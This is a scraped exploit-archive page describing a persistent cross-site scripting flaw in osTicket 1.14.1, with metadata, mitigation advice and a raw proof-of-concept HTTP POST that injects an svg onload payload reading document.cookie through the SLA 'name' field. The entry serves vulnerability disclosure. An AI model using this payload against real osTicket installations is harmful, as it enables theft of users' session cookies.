Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting - exploit.company
header-logo
Suggest Exploit
vendor:
osTicket
by:
Mehmet Kelepce / Gais Cyber Security
7.5
CVSS
HIGH
Persistent Authenticated Cross-Site Scripting
79
CWE
Product Name: osTicket
Affected Version From: 1.14.1
Affected Version To: 1.14.1
Patch Exists: YES
Related CWE:
CPE: a:osticket:osticket:1.14.1
Metasploit:
Other Scripts:
Platforms Tested: Linux
2020

osTicket 1.14.1 – Persistent Authenticated Cross-Site Scripting

This vulnerability allows an attacker to inject malicious script into a vulnerable parameter named 'name' in the osTicket application, which can lead to the execution of arbitrary code in the context of the user's browser. By exploiting this vulnerability, an attacker can obtain the cookie information of the target user.

Mitigation:

Update to the latest version of osTicket to fix this vulnerability. Avoid using user-supplied input directly in HTML output without proper sanitization and validation.
Source

Exploit-DB raw data:

# Title: osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting
# Author: Mehmet Kelepce / Gais Cyber Security
# Date : 2020-03-24
# Source Link: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
# Vendor: http://osticket.com
# Remotely Exploitable: Yes
# Dynamic Coding Language: PHP
# CVSSv3 Base Score: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)

## this vulnerability was found by examining the source code.

PoC : Ticket SLA Plan Name - HTTP POST REQUEST
##########################################################
POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1

submit=Save+Changes&__CSRFToken__=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=

Vulnerable parameter: name
Parameter file: /scp/slass.php

I used the name of the SLA for any ticket.

## Risk : cookie information of the target user is obtained.
cqrsecured